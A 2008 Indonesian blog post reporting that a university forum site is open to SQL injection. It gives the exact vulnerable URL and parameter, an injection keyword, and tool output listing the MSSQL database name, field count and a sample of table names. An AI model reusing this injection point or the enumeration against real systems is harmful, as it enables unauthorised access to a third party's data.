05
Sep
08

Situs forum Amikom di SQL injection

Baru dapet kabar situs forum amikom di SQL injection, waktu di cek, hasilnya…

Target  : http://forum.amikom.ac.id/main/view_topics.php?fid=2
Keyword : or:#FF5921
Inject type : String
DB type is : MSSQL
The field’s count 9
The string field position at 4
Current database is : SmartManagement
Field count is : 9
String field postion at : 4
Tables count is : 300

Get table : PROJECTLITBANG
Get table : TEMP_KULIAHTEORI
Get table : JADWAL_PSU
Get table : STATISTIK
Get table : DEPARTMENT
Get table : TEMP_JADWALP
Get table : JENIS_KWJ
Get table : TRANS_DEPT
Get table : DETAIL_PESANPINJAM
Get table : JADWAL_TES
Get table : TEMP_JADWALT
Get table : profildosenlocal
Get table : trans_ujian
Get table : SURAT_LAMARAN
Get table : KEGIATAN_DOSEN
….


2 Responses to “Situs forum Amikom di SQL injection”


  1. 1 alvin
    Oktober 18, 2008 pukul 4:08 pm

    di ngetest nya pakai apa?

    Taufan :
    pake beberapa tools dan sql commands


Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s


Siapa sih yang punyak sarang?

Saya adalah Taufan Dwi Prayogo. Seorang mahasiswa tingkat akhir jurusan Ilmu Komputer Universitas Diponegoro, Semarang.

Yang nasipnya diujung tanduk karena udah hampir 4 taun tapi ndak lulus-lulus. Karena udah terkena sindrom mahasiswa tingkat akhir, yang salah pergaulan dan memiliki masa depan yang kurang meyakinkan. Bidang yang saya gauli juga ndak jelas, amburadul dan ndak karuan.

Blog ini sebenarnya memiliki tema tentang Teknologi Informasi, namun karena bidang saya yang ndak jelas. Blog ini jadi tidak bermutu memiliki tema lagi.

Insya allah semua posting di blog ini aseli saya yang mikir. Dan kalo situ mau ngopi silahkan aja. Tapi jangan lupa tolong cantumkan sumbernya.

Para pencari sarang

  • 172,260 jiwa

Status Yahoo

Kalender

September 2008
S S R K J S M
« Jul   Okt »
1234567
891011121314
15161718192021
22232425262728
2930  

Tools

smadav antivirus indonesia

Klik banner untuk tambah Page Rank blog anda
Increase your PageRank

Powered by  MyPagerank.Net

Yang sedang Online
page counter

IP

Locations of visitors to this page

dmoz.org

Laman


%d blogger menyukai ini: